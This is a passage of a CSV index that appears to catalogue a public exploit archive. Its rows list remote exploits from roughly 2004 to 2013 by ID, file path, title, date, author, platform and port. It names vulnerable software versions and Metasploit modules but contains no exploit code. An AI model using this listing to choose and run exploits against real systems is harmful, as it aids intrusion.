Remote Buffer Overflow",2004-09-03,celebrityhacker,remote,windows, +24572,exploits/windows/remote/24572.pl,"Ipswitch WhatsUp Gold 7.0/8.0 - Notification Instance Name Remote Buffer Overflow",2004-09-03,anonymous,remote,windows, +24720,exploits/windows/remote/24720.txt,"Microsoft Internet Explorer 6 - IFRAME Status Bar URI Obfuscation",2004-11-02,"Benjamin Tobias Franz",remote,windows, +24581,exploits/multiple/remote/24581.txt,"SAFE TEAM Regulus 2.2 - Staffile Information Disclosure",2004-09-07,masud_libra,remote,multiple, +24584,exploits/windows/remote/24584.c,"Cerulean Studios Trillian Client 0.74 MSN Module - Remote Buffer Overflow",2004-09-08,Komrade,remote,windows, +24598,exploits/multiple/remote/24598.txt,"SnipSnap 0.5.2 - HTTP Response Splitting",2004-09-14,"Maestro De-Seguridad",remote,multiple, +24600,exploits/windows/remote/24600.txt,"myserver 0.7 - Directory Traversal",2004-09-15,scrap,remote,windows, +24607,exploits/windows/remote/24607.txt,"Google Toolbar 1.1.x - About.HTML HTML Injection",2004-09-17,ViperSV,remote,windows, +24622,exploits/linux/remote/24622.c,"LaTeX2rtf 1.9.15 - Remote Buffer Overflow",2004-09-21,"D. J. Bernstein",remote,linux, +24623,exploits/windows/remote/24623.txt,"Sophos Anti-Virus 3.x - Reserved MS-DOS Name Scan Evasion",2004-09-22,"Kurt Seifried",remote,windows, +24624,exploits/windows/remote/24624.c,"Alt-N MDaemon 6.5.1 SMTP Server - Multiple Command Remote Overflows",2004-09-16,D_BuG,remote,windows, +24653,exploits/windows/remote/24653.txt,"VyPRESS Messenger 3.5 - Remote Buffer Overflow",2004-10-01,"Luigi Auriemma",remote,windows, +24654,exploits/multiple/remote/24654.txt,"Macromedia ColdFusion MX 6.1 - Template Handling Privilege Escalation",2004-10-04,"Eric Lackey",remote,multiple, +24656,exploits/php/remote/24656.txt,"PHP 4.x/5.0.1 - PHP_Variables Remote Memory Disclosure",2004-09-15,"Stefano Di Paola",remote,php, +24669,exploits/linux/remote/24669.txt,"MySQL 3.x/4.x - ALTER TABLE/RENAME Forces Old Permission Checks",2004-10-08,"Oleksandr Byelkin",remote,linux, +24681,exploits/hardware/remote/24681.txt,"3Com 3CRADSL72 ADSL Wireless Router - Information Disclosure / Authentication Bypass",2004-10-13,Karb0nOxyde,remote,hardware, +24686,exploits/windows/remote/24686.txt,"Microsoft Outlook 2003 - Security Policy Bypass",2004-10-18,http-equiv,remote,windows, +24687,exploits/windows/remote/24687.txt,"Microsoft Outlook Express 4.x/5.x/6.0 - Plaintext Email Security Policy Bypass",2004-10-18,http-equiv,remote,windows, +24688,exploits/windows/remote/24688.pl,"best software SalesLogix 2000.0 - Multiple Vulnerabilities",2004-10-18,"Carl Livitt",remote,windows, +24693,exploits/windows/remote/24693.txt,"Microsoft Internet Explorer 5.x - Valid File Drag and Drop Embedded Code (MS04-038)",2004-10-20,http-equiv,remote,windows, +24977,exploits/linux/remote/24977.txt,"CUPS 1.1.x - '.HPGL' File Processor Buffer Overflow",2004-12-15,"Ariel Berkman",remote,linux, +24978,exploits/linux/remote/24978.txt,"Xine-Lib 0.9/1 - Remote Client-Side Buffer Overflow",2004-12-16,"Ariel Berkman",remote,linux, +24701,exploits/multiple/remote/24701.txt,"OpenWFE 1.4.x - Cross-Site Scripting / Connection Proxy",2004-10-25,"Joxean Koret",remote,multiple, +24704,exploits/linux/remote/24704.c,"Libxml2 - Multiple Remote Stack Buffer Overflow Vulnerabilities",2004-10-26,Sean,remote,linux, +24707,exploits/multiple/remote/24707.txt,"Google Desktop Search - Cross-Site Scripting",2004-10-26,"Salvatore Aranzulla",remote,multiple, +24890,exploits/windows/remote/24890.rb,"ActFax 5.01 - RAW Server Buffer Overflow (Metasploit)",2013-03-26,Metasploit,remote,windows, +24711,exploits/php/remote/24711.php,"PHP 4.x/5 - cURL 'open_basedir' Restriction Bypass",2004-10-28,FraMe,remote,php, +24712,exploits/windows/remote/24712.txt,"Microsoft Internet Explorer 6 - TABLE Status Bar URI Obfuscation",2004-10-28,"Benjamin Tobias Franz",remote,windows, +24713,exploits/multiple/remote/24713.txt,"Global Spy Software Cyber Web Filter 2 - IP Filter Bypass",2004-10-29,anonymous,remote,multiple, +24714,exploits/windows/remote/24714.txt,"Microsoft Internet Explorer 6 - HTML Form Tags URI Obfuscation",2004-10-30,http-equiv,remote,windows, +24716,exploits/osx/remote/24716.txt,"Apple Safari 1.2 Web Browser - TABLE Status Bar URI Obfuscation",2004-11-01,"Gilbert Verdian",remote,osx, +24724,exploits/multiple/remote/24724.c,"Monolith Lithtech Game Engine - Multiple Remote Format String Vulnerabilities",2004-11-05,"Luigi Auriemma",remote,multiple, +24725,exploits/multiple/remote/24725.php,"Trend Micro ScanMail for Domino 2.51/2.6 - Remote File Disclosure",2004-11-05,DokFLeed,remote,multiple, +24727,exploits/windows/remote/24727.txt,"Microsoft Internet Explorer 6 - Local Resource Enumeration",2004-11-08,"Benjamin Tobias Franz",remote,windows, +24728,exploits/windows/remote/24728.txt,"Microsoft Internet Explorer 6.0 / Firefox 0.x / Netscape 7.x - IMG Tag Multiple Vulnerabilities",2004-11-10,"Wolfgang Schwarz",remote,windows, +24730,exploits/multiple/remote/24730.txt,"04webserver 1.42 - Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",remote,multiple, +24745,exploits/windows/remote/24745.rb,"Honeywell HSC Remote Deployer - ActiveX Remote Code Execution (Metasploit)",2013-03-13,Metasploit,remote,windows, +24760,exploits/hardware/remote/24760.txt,"ZYXEL 3 Prestige Router - HTTP Remote Administration Configuration Reset",2004-11-22,"Francisco Canela",remote,hardware, +24767,exploits/windows/remote/24767.txt,"Raven Software Soldier Of Fortune 2 - Remote Buffer Overflow",2004-11-23,"Luigi Auriemma",remote,windows, +24774,exploits/multiple/remote/24774.java,"Open DC Hub 0.7.14 - Remote Buffer Overflow",2004-11-24,"Donato Ferrante",remote,multiple, +24784,exploits/linux/remote/24784.txt,"File ELF 4.x - Header Buffer Overflow",2004-11-29,anonymous,remote,linux, +24813,exploits/linux/remote/24813.pl,"GNU Wget 1.x - Multiple Vulnerabilities",2004-12-10,"Jan Minar",remote,linux, +24794,exploits/linux/remote/24794.sh,"SCPOnly 2.x/3.x - Arbitrary Command Execution",2004-12-02,"Jason Wies",remote,linux, +24795,exploits/linux/remote/24795.txt,"RSSH 2.x - Arbitrary Command Execution",2004-12-02,"Jason Wies",remote,linux, +24800,exploits/windows/remote/24800.txt,"Microsoft Internet Explorer 5.0.1 - FTP URI Arbitrary FTP Server Command Execution",2004-12-06,"Albert Puigsech Galicia",remote,windows, +24801,exploits/linux/remote/24801.txt,"KDE FTP - KIOSlave URI Arbitrary FTP Server Command Execution",2004-12-06,"Albert Puigsech Galicia",remote,linux, +24802,exploits/windows/remote/24802.txt,"Microsoft Internet Explorer 6 - Sysimage Protocol Handler Local File Detection",2004-12-07,"Gregory R. Panakkal",remote,windows, +24808,exploits/windows/remote/24808.txt,"Microsoft Internet Explorer 6 - Search Pane URI Obfuscation",2004-12-08,http-equiv,remote,windows, +24811,exploits/windows/remote/24811.txt,"F-Secure Policy Manager 5.11 - 'FSMSH.dll' CGI Application Installation Full Path Disclosure",2004-12-09,oliver@greyhat.de,remote,windows, +24852,exploits/linux/remote/24852.txt,"MPG123 0.59 - Find Next File Remote Client-Side Buffer Overflow",2004-12-15,"Bartlomiej Sieka",remote,linux, +24853,exploits/linux/remote/24853.c,"MPlayer 0.9/1.0 - MMST Get_Header Remote Client-Side Buffer Overflow",2004-12-15,"Ariel Berkman",remote,linux, +24848,exploits/linux/remote/24848.txt,"ChBg 1.5 - Scenario File Overflow",2004-12-15,"Danny Lungstrom",remote,linux, +24856,exploits/linux/remote/24856.c,"NapShare 1.2 - Remote Buffer Overflow (1)",2004-12-06,"Bartlomiej Sieka",remote,linux, +24857,exploits/linux/remote/24857.c,"NapShare 1.2 - Remote Buffer Overflow (2)",2004-12-10,"Bartlomiej Sieka",remote,linux, +24874,exploits/multiple/remote/24874.rb,"Apache Struts - 'ParametersInterceptor' Remote Code Execution (Metasploit)",2013-03-22,Metasploit,remote,multiple, +24875,exploits/windows/remote/24875.rb,"Sami FTP Server - LIST Command Buffer Overflow (Metasploit)",2013-03-22,Metasploit,remote,windows, +24876,exploits/windows/remote/24876.rb,"Cool PDF Image Stream - Remote Buffer Overflow (Metasploit)",2013-03-22,Metasploit,remote,windows, +24886,exploits/windows/remote/24886.html,"Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' 'WzTitle' Remote Heap Spray",2013-03-25,Dr_IDE,remote,windows, +24887,exploits/windows/remote/24887.rb,"KingView - Log File Parsing Buffer Overflow (Metasploit)",2013-03-25,Metasploit,remote,windows, +24888,exploits/linux/remote/24888.rb,"Mutiny - Remote Command Execution (Metasploit)",2013-03-25,Metasploit,remote,linux, +24891,exploits/windows/remote/24891.rb,"HP Intelligent Management Center - Arbitrary File Upload (Metasploit)",2013-03-26,Metasploit,remote,windows, +24892,exploits/hardware/remote/24892.txt,"Rosewill RSVA11001 - Remote Command Injection",2013-03-26,"Eric Urban",remote,hardware, +24897,exploits/windows/remote/24897.rb,"KNet Web Server 1.04b - Remote Buffer Overflow (SEH)",2013-03-29,"Myo Soe",remote,windows, +24943,exploits/windows/remote/24943.py,"BigAnt Server 2.97 - DDNF 'Username' Remote Buffer Overflow",2013-04-10,"Craig Freyman",remote,windows, +24955,exploits/linux/remote/24955.rb,"Nagios Remote Plugin Executor - Arbitrary Command Execution (Metasploit)",2013-04-12,Metasploit,remote,linux,5666 +24902,exploits/php/remote/24902.rb,"STUNSHELL (Web Shell) - PHP Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,php, +24903,exploits/php/remote/24903.rb,"STUNSHELL (Web Shell) - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,php, +24904,exploits/windows/remote/24904.rb,"Java CMM - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,windows, +24905,exploits/multiple/remote/24905.rb,"v0pCr3w (Web Shell) - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,multiple, +24907,exploits/windows/remote/24907.txt,"McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method",2013-03-29,"High-Tech Bridge SA",remote,windows, +24931,exploits/hardware/remote/24931.rb,"NETGEAR DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit)",2013-04-08,Metasploit,remote,hardware, +24935,exploits/linux/remote/24935.rb,"MongoDB - nativeHelper.apply Remote Code Execution (Metasploit)",2013-04-08,Metasploit,remote,linux, +24936,exploits/hardware/remote/24936.rb,"Linksys E1500/E2500 - 'apply.cgi' Remote Command Injection (Metasploit)",2013-04-08,Metasploit,remote,hardware, +24937,exploits/linux/remote/24937.rb,"HP System Management - Anonymous Access Code Execution (Metasploit)",2013-04-08,Metasploit,remote,linux, +24938,exploits/multiple/remote/24938.rb,"Novell ZENworks Configuration Management 10 SP3/11 SP2 - Remote Execution (Metasploit)",2013-04-08,Metasploit,remote,multiple, +24950,exploits/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption Buffer Overflow",2013-04-12,Wireghoul,remote,windows, +643,exploits/windows/remote/643.c,"Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (2)",2004-12-21,"Haroon Rashid Astwat",remote,windows,110 +646,exploits/windows/remote/646.c,"Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (3)",2004-12-22,"Ivan Ivanovic",remote,windows, +24944,exploits/windows/remote/24944.py,"Freefloat FTP Server 1.0 - DEP Bypass with ROP",2013-04-10,negux,remote,windows, +24945,exploits/hardware/remote/24945.rb,"Linksys WRT54GL - 'apply.cgi' Command Execution (Metasploit)",2013-04-10,Metasploit,remote,hardware, +24946,exploits/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Multiple Vulnerabilities (Metasploit)",2013-04-10,Metasploit,remote,multiple, +24947,exploits/linux/remote/24947.txt,"MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution",2013-04-08,agixid,remote,linux, +24956,exploits/hardware/remote/24956.rb,"D-Link DIR-645 / DIR-815 - 'diagnostic.php' Command Execution (Metasploit)",2013-04-12,Metasploit,remote,hardware, +24958,exploits/windows/remote/24958.py,"MinaliC WebServer 2.0.0 - Remote Buffer Overflow",2013-04-15,superkojiman,remote,windows, +24961,exploits/windows/remote/24961.html,"FirePHP Firefox Plugin 0.7.1 - Remote Command Execution",2013-04-17,Wireghoul,remote,windows, +24963,exploits/multiple/remote/24963.rb,"SAP ConfigServlet - OS Command Execution (Metasploit)",2013-04-18,"Andras Kabai",remote,multiple,50000 +25091,exploits/multiple/remote/25091.txt,"realnetworks realarcade 1.2.0.994 - Multiple Vulnerabilities",2005-02-08,"Luigi Auriemma",remote,multiple, +24974,exploits/hardware/remote/24974.rb,"NETGEAR DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit)",2013-04-22,Metasploit,remote,hardware, +24976,exploits/multiple/remote/24976.rb,"Java Applet - Reflection Type Confusion Remote Code Execution (Metasploit)",2013-04-23,Metasploit,remote,multiple, +24979,exploits/multiple/remote/24979.txt,"XLReader 0.9 - Remote Client-Side Buffer Overflow",2004-12-16,"Kris Kubicki",remote,multiple, +24980,exploits/multiple/remote/24980.txt,"Yanf 0.4 - HTTP Response Buffer Overflow",2004-12-15,"Ariel Berkman",remote,multiple, +24981,exploits/multiple/remote/24981.txt,"JPegToAvi 1.5 - File List Buffer Overflow",2004-12-15,"James Longstreet",remote,multiple, +24982,exploits/multiple/remote/24982.txt,"Bolthole Filter 2.6.1 - Address Parsing Buffer Overflow",2004-12-15,"Ariel Berkman",remote,multiple, +24983,exploits/multiple/remote/24983.txt,"Vilistextum 2.6.6 - HTML Attribute Parsing Buffer Overflow",2004-12-15,"Ariel Berkman",remote,multiple, +24984,exploits/multiple/remote/24984.txt,"2Fax 3.0 Tab Expansion - Remote Buffer Overflow",2004-12-15,"Ariel Berkman",remote,multiple, +24985,exploits/php/remote/24985.txt,"PHP 4/5 - 'addslashes()' Null Byte Bypass",2004-12-16,"Daniel Fabian",remote,php, +24995,exploits/multiple/remote/24995.txt,"DXFScope 0.2 - Remote Client-Side Buffer Overflow",2004-12-16,"Ariel Berkman",remote,multiple, +24996,exploits/windows/remote/24996.rb,"SAP ConfigServlet - Unauthenticated Remote Payload Execution (Metasploit)",2013-04-25,"Andras Kabai",remote,windows, +25187,exploits/windows/remote/25187.txt,"Computalynx CProxy 3.3/3.4.x - Directory Traversal",2005-03-03,"Kristof Philipsen",remote,windows, +25188,exploits/windows/remote/25188.txt,"Opera 7.x/Firefox 1.0/Internet Explorer 6.0 - Information Disclosure",2005-02-19,upken,remote,windows, +25190,exploits/multiple/remote/25190.txt,"ca3de - Multiple Vulnerabilities",2005-03-03,"Luigi Auriemma",remote,multiple, +25191,exploits/multiple/remote/25191.txt,"JoWood Chaser 1.0/1.50 - Remote Buffer Overflow",2005-03-07,"Luigi Auriemma",remote,multiple, +25194,exploits/windows/remote/25194.txt,"Hosting Controller 1.x/6.1 - Multiple Information Disclosure Vulnerabilities",2005-03-07,"small mouse",remote,windows, +29277,exploits/windows/remote/29277.txt,"Winamp Web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",remote,windows, +24999,exploits/windows/remote/24999.py,"Light HTTPD 0.1 (Windows) - Remote Buffer Overflow",2013-04-25,"Jacob Holcomb",remote,windows, +25294,exploits/windows/remote/25294.rb,"Microsoft Internet Explorer - CGenericElement Object Use-After-Free (Metasploit)",2013-05-07,Metasploit,remote,windows, +25001,exploits/linux/remote/25001.rb,"GroundWork - 'monarch_scan.cgi' OS Command Injection (Metasploit)",2013-04-25,Metasploit,remote,linux, +25005,exploits/linux/remote/25005.txt,"NASM 0.98.x - Error Preprocessor Directive Buffer Overflow",2004-12-15,"Jonathan Rockway",remote,linux, +25006,exploits/linux/remote/25006.txt,"RTF2LATEX2E 1.0 - Remote Stack Buffer Overflow",2004-12-16,"Limin Wang",remote,linux, +25008,exploits/linux/remote/25008.txt,"LinPopUp 1.2 - Remote Buffer Overflow",2004-12-15,"Stephen Dranger",remote,linux, +25009,exploits/windows/remote/25009.txt,"Gadu-Gadu 6.0 - URL Parser JavaScript Cross-Site Scripting",2004-12-17,"Jaroslaw Sajko",remote,windows, +25010,exploits/linux/remote/25010.txt,"O3Read 0.0.3 - HTML Parser Buffer Overflow",2004-12-17,"Wiktor Kopec",remote,linux, +25011,exploits/multiple/remote/25011.txt,"HTML2HDML 1.0.3 - File Conversion Buffer Overflow",2004-12-15,"Matthew Dabrowski",remote,multiple, +25013,exploits/windows/remote/25013.txt,"Interactive Studio GamePort 3.0/3.1/4.0 - Arbitrary Application Execution",2004-12-17,"amoXi & Dr.vaXin",remote,windows, +25015,exploits/linux/remote/25015.txt,"Michael Kohn Ringtone Tools 2.22 - '.EMelody' File Remote Buffer Overflow",2004-12-15,"Qiao Zhang",remote,linux, +25016,exploits/windows/remote/25016.txt,"ASP2PHP 0.76.23 - Preparse Token Variable Buffer Overflow",2004-12-15,"Qiao Zhang",remote,windows, +25018,exploits/multiple/remote/25018.txt,"ABC2MTEX 1.6.1 - Process ABC Key Field Buffer Overflow",2004-12-15,"Limin Wang",remote,multiple, +25019,exploits/multiple/remote/25019.txt,"ABC2MIDI 2004-12-04 - Multiple Stack Buffer Overflow Vulnerabilities",2004-12-15,"Limin Wang",remote,multiple, +25020,exploits/windows/remote/25020.txt,"Michael Kohn VB2C 0.02 - '.FRM' File Remote Buffer Overflow",2004-12-15,"Qiao Zhang",remote,windows, +25021,exploits/windows/remote/25021.txt,"ABCPP 1.3 - Directive Handler Buffer Overflow",2004-12-15,"Yosef Klein",remote,windows, +25022,exploits/windows/remote/25022.txt,"Jef Moine abcm2ps 3.7.20 - '.ABC' File Remote Buffer Overflow",2004-12-15,"Limin Wang",remote,windows, +25023,exploits/windows/remote/25023.txt,"PGN2WEB 0.3 - Remote Buffer Overflow",2004-12-15,"Tom Palarz",remote,windows, +25025,exploits/windows/remote/25025.txt,"ABC2PS/JCABC2PS 1.2 - Voice Field Buffer Overflow",2004-12-15,"Tom Palarz",remote,windows, +25026,exploits/windows/remote/25026.txt,"Mesh Viewer 0.2.2 - Remote Buffer Overflow",2004-12-15,"Mohammed Khan",remote,windows, +25027,exploits/windows/remote/25027.txt,"abctab2ps 1.6.3 - 'Write_Heading' '.ABC' Remote Buffer Overflow",2004-12-15,"Limin Wang",remote,windows, +25028,exploits/multiple/remote/25028.txt,"CSV2XML 0.5.1 - Remote Buffer Overflow",2004-12-15,"Limin Wang",remote,multiple, +25029,exploits/windows/remote/25029.txt,"abctab2ps 1.6.3 - 'Trim_Title' '.ABC' File Remote Buffer Overflow",2004-12-15,"Limin Wang",remote,windows, +25030,exploits/linux/remote/25030.txt,"GNU UnRTF 0.19.3 - Font Table Conversion Buffer Overflow",2004-12-15,"Yosef Klein",remote,linux, +25031,exploits/windows/remote/25031.html,"Microsoft Windows Media Player 9.0 - ActiveX Control Media File Attribute Corruption",2004-12-18,"Arman Nayyeri",remote,windows, +25032,exploits/windows/remote/25032.html,"Microsoft Windows Media Player 9.0 - ActiveX Control File Enumeration",2004-12-18,"Arman Nayyeri",remote,windows, +25033,exploits/windows/remote/25033.txt,"GREED 0.81 - '.GRX' File List Buffer Overflow",2004-12-15,"Manigandan Radhakrishnan",remote,windows, +25034,exploits/windows/remote/25034.txt,"GREED 0.81 - '.GRX' File List Command Execution",2004-12-15,"Manigandan Radhakrishnan",remote,windows, +25035,exploits/linux/remote/25035.txt,"PCAL 4.x - Calendar File 'getline' Remote Buffer Overflow",2004-12-15,"Danny Lungstrom",remote,linux, +25036,exploits/linux/remote/25036.txt,"PCAL 4.x - Calendar File 'get_holiday' Remote Buffer Overflow",2004-12-15,"Danny Lungstrom",remote,linux, +25049,exploits/windows/remote/25049.txt,"Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Integer Overflow",2004-12-23,"flashsky fangxing",remote,windows, +25050,exploits/windows/remote/25050.txt,"Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Heap Overflow",2004-12-23,"flashsky fangxing",remote,windows, +25054,exploits/linux/remote/25054.txt,"konversation irc client 0.15 - Multiple Vulnerabilities",2005-01-19,wouter@coekaerts.be,remote,linux, +25057,exploits/windows/remote/25057.txt,"DivX Player 2.6 - '.Skin' File Directory Traversal",2005-01-21,"Luigi Auriemma",remote,windows, +25066,exploits/multiple/remote/25066.txt,"WebWasher Classic 2.2/2.3 - HTTP CONNECT Unauthorized Access",2005-01-28,"Oliver Karow",remote,multiple, +25072,exploits/multiple/remote/25072.txt,"CitrusDB 0.1/0.2/0.3 Credit Card Data - Remote Information Disclosure",2005-01-31,"Maximillian Dornseif",remote,multiple, +25079,exploits/multiple/remote/25079.txt,"People Can Fly Painkiller Gamespy 1.3 - CD-Key Hash Remote Buffer Overflow",2005-02-02,"Luigi Auriemma",remote,multiple, +25092,exploits/windows/remote/25092.txt,"Software602 602 Lan Suite 2004 2004.0.04.1221 - Arbitrary File Upload",2005-02-08,"Tan Chew Keong",remote,windows, +25094,exploits/windows/remote/25094.c,"Microsoft MSN Messenger 6.2.0137 - '.png' Remote Buffer Overflow",2005-02-08,ATmaCA,remote,windows, +25095,exploits/windows/remote/25095.txt,"Microsoft Internet Explorer 5.0.1 - Mouse Event URI Status Bar Obfuscation",2005-02-14,Paul,remote,windows, +25122,exploits/linux/remote/25122.txt,"glFTPd 1.x/2.0 'ZIP' Plugins - Multiple Directory Traversal Vulnerabilities",2005-02-18,"Paul Craig",remote,linux, +25129,exploits/windows/remote/25129.html,"Microsoft Internet Explorer 6 - Pop-up Window Title Bar Spoofing",2005-02-21,"bitlance winter",remote,windows, +25132,exploits/multiple/remote/25132.txt,"Bontago Game Server 1.1 - Remote Nickname Buffer Overrun",2005-02-21,"Luigi Auriemma",remote,multiple, +25133,exploits/multiple/remote/25133.txt,"xinkaa Web station 1.0.3 - Directory Traversal",2005-02-21,"Luigi Auriemma",remote,multiple, +25136,exploits/php/remote/25136.rb,"phpMyAdmin - 'preg_replace' Authenticated Remote Code Execution (Metasploit)",2013-05-01,Metasploit,remote,php, +25137,exploits/php/remote/25137.rb,"WordPress Plugin W3 Total Cache - PHP Code Execution (Metasploit)",2013-05-01,Metasploit,remote,php, +25144,exploits/windows/remote/25144.txt,"sd server 4.0.70 - Directory Traversal",2005-02-21,CorryL,remote,windows, +25146,exploits/windows/remote/25146.txt,"OpenConnect WebConnect 6.4/6.5 - jretest.html Traversal Arbitrary File Access",2005-02-21,"Dennis Rand",remote,windows, +25150,exploits/linux/remote/25150.txt,"Winace UnAce 1.x - ACE Archive Directory Traversal",2005-02-23,"Ulf Harnhammar",remote,linux, +25157,exploits/windows/remote/25157.txt,"Microsoft Log Sink Class - ActiveX Control Arbitrary File Creation",2003-04-29,"Shane Hird",remote,windows, +25163,exploits/windows/remote/25163.txt,"CIS WebServer 3.5.13 - Directory Traversal",2005-02-25,CorryL,remote,windows, +25166,exploits/windows/remote/25166.c,"Working Resources BadBlue 2.55 - MFCISAPICommand Remote Buffer Overflow (1)",2004-12-26,"Miguel Tarasc",remote,windows, +25167,exploits/windows/remote/25167.c,"Working Resources BadBlue 2.55 - MFCISAPICommand Remote Buffer Overflow (2)",2005-02-27,class101,remote,windows, +25181,exploits/windows/remote/25181.py,"Cerulean Studios Trillian 3.0 - Remote '.png' Image File Parsing Buffer Overflow",2005-03-02,"Tal Zeltzer",remote,windows, +25195,exploits/windows/remote/25195.txt,"Oracle Database 8i/9i - Multiple Directory Traversal Vulnerabilities",2005-03-07,"Cesar Cerrudo",remote,windows, +25196,exploits/windows/remote/25196.txt,"Yahoo! Messenger 5.x/6.0 - Offline Mode Status Remote Buffer Overflow",2005-03-08,"Mehrtash Mallahzadeh",remote,windows, +25205,exploits/multiple/remote/25205.txt,"Techland XPand Rally 1.0/1.1 - Remote Format String",2005-03-10,"Luigi Auriemma",remote,multiple, +25207,exploits/windows/remote/25207.txt,"PY Software Active Webcam 4.3/5.5 - WebServer Multiple Vulnerabilities",2005-03-10,Sowhat,remote,windows, +25209,exploits/multiple/remote/25209.pl,"MySQL 4.x - CREATE FUNCTION Arbitrary libc Code Execution",2005-03-11,"Stefano Di Paola",remote,multiple, +25210,exploits/multiple/remote/25210.php,"MySQL 4.x - CREATE FUNCTION mysql.func Table Arbitrary Library Injection",2005-03-11,"Stefano Di Paola",remote,multiple, +25211,exploits/multiple/remote/25211.c,"MySQL 4.x - CREATE Temporary TABLE Symlink Privilege Escalation",2006-01-18,"Marco Ivaldi",remote,multiple, +25221,exploits/linux/remote/25221.txt,"Mozilla Suite/Firefox/Thunderbird - Nested Anchor Tag Status Bar Spoofing",2005-03-14,"bitlance winter",remote,linux, +25238,exploits/multiple/remote/25238.txt,"Icecast 2.x - XSL Parser Multiple Vulnerabilities",2005-03-18,patrick,remote,multiple, +25274,exploits/windows/remote/25274.html,"Maxthon Web Browser 1.2 - Search Bar Information Disclosure",2005-03-25,"Aviv Raff",remote,windows, +25275,exploits/linux/remote/25275.c,"Smail 3 - Multiple Remote/Local Vulnerabilities",2005-03-25,infamous42md,remote,linux, +25291,exploits/multiple/remote/25291.txt,"Tincat Network Library - Remote Buffer Overflow",2005-03-28,"Luigi Auriemma",remote,multiple, +25775,exploits/linux/remote/25775.rb,"Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit)",2013-05-28,Metasploit,remote,linux,80 +25297,exploits/linux/remote/25297.txt,"Dovecot with Exim - 'sender_address' Remote Command Execution",2013-05-07,"RedTeam Pentesting GmbH",remote,linux, +25319,exploits/windows/remote/25319.txt,"FastStone 4in1 Browser 1.2 - Web Server Directory Traversal",2005-03-29,"Donato Ferrante",remote,windows, +25321,exploits/linux/remote/25321.c,"YepYep MTFTPD 0.2/0.3 - Remote CWD Argument Format String",2005-03-30,gunzip,remote,linux, +25325,exploits/windows/remote/25325.txt,"BlueSoleil 1.4 - Object Push Service BlueTooth Arbitrary File Upload / Directory Traversal",2005-04-01,"Kevin Finisterre",remote,windows, +25335,exploits/unix/remote/25335.txt,"IBM iSeries AS400 LDAP Server - Remote Information Disclosure",2005-04-04,"Shalom Carmel",remote,unix, +25336,exploits/windows/remote/25336.txt,"Logics Software LOG-FT - Arbitrary File Disclosure",2005-04-05,"Pedro Viuales & Rom Ramirez",remote,windows, +25359,exploits/hardware/remote/25359.txt,"Linksys WET11 - Password Update Remote Authentication Bypass",2005-04-07,"Kristian Hermansen",remote,hardware, +25365,exploits/windows/remote/25365.txt,"AN HTTPD 1.42 - Arbitrary Log Content Injection",2005-04-08,"Tan Chew Keong",remote,windows, +25375,exploits/linux/remote/25375.pl,"KDE KMail 1.7.1 - HTML EMail Remote Email Content Spoofing",2005-04-11,"Noam Rathaus",remote,linux, +25384,exploits/windows/remote/25384.c,"Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (2)",2005-04-16,"Yuri Gushin",remote,windows, +25385,exploits/windows/remote/25385.cpp,"Microsoft Internet Explorer 5.0.1 - Content Advisor File Handling Buffer Overflow (MS05-020)",2005-04-12,"Miguel Tarasc",remote,windows, +25386,exploits/windows/remote/25386.txt,"Microsoft Internet Explorer 5.0.1 - DHTML Object Race Condition Memory Corruption",2005-04-12,"Berend-Jan Wever",remote,windows, +25391,exploits/multiple/remote/25391.txt,"XAMPP - 'Phonebook.php' Multiple Remote HTML Injection Vulnerabilities",2005-04-12,"Morning Wood",remote,multiple, +25392,exploits/linux/remote/25392.c,"Salim Gasmi GLD (Greylisting Daemon) 1.x - Postfix Greylisting Daemon Buffer Overflow",2005-04-12,Xpl017Elz,remote,linux, +25395,exploits/multiple/remote/25395.txt,"Sun JavaMail 1.3.2 - 'MimeBodyPart.getFileName' Directory Traversal",2005-04-12,"Rafael San Miguel Carrasco",remote,multiple, +25396,exploits/multiple/remote/25396.txt,"Oracle 8.x/9.x/10.x Database - Multiple SQL Injections",2005-04-13,"Esteban Martinez Fayo",remote,multiple, +25397,exploits/multiple/remote/25397.txt,"Oracle Database 10.1 - MDSYS.MD2.SDO_CODE_SIZE Buffer Overflow",2005-04-13,"Esteban Martinez Fayo",remote,multiple, +25420,exploits/multiple/remote/25420.txt,"IBM Websphere 5.0/5.1/6.0 - Application Server Web Server Root JSP Source Code Disclosure",2005-04-13,"SPI Labs",remote,multiple, +25421,exploits/windows/remote/25421.txt,"RSA Security RSA Authentication Agent For Web 5.2 - Cross-Site Scripting",2005-04-15,"Oliver Karow",remote,windows, +25445,exploits/multiple/remote/25445.rb,"SAP SOAP RFC - SXPG_CALL_SYSTEM Remote Command Execution (Metasploit)",2013-05-14,Metasploit,remote,multiple,8000 +25446,exploits/multiple/remote/25446.rb,"SAP SOAP RFC - SXPG_COMMAND_EXECUTE Remote Command Execution (Metasploit)",2013-05-14,Metasploit,remote,multiple,8000 +25452,exploits/multiple/remote/25452.pl,"Oracle 10g Database - 'SUBSCRIPTION_NAME' SQL Injection (1)",2007-02-23,bunker,remote,multiple, +25453,exploits/multiple/remote/25453.pl,"Oracle 10g Database - 'SUBSCRIPTION_NAME' SQL Injection (2)",2007-02-26,bunker,remote,multiple, +25454,exploits/windows/remote/25454.txt,"Microsoft Windows 98/2000 Explorer - Preview Pane Script Injection",2005-04-19,"GreyMagic Software",remote,windows, +25486,exploits/windows/remote/25486.txt,"RaidenFTPd 2.4 - Unauthorized File Access",2005-04-21,"Lachlan. H",remote,windows, +25487,exploits/windows/remote/25487.txt,"yawcam 0.2.5 - Directory Traversal",2005-04-21,"Donato Ferrante",remote,windows, 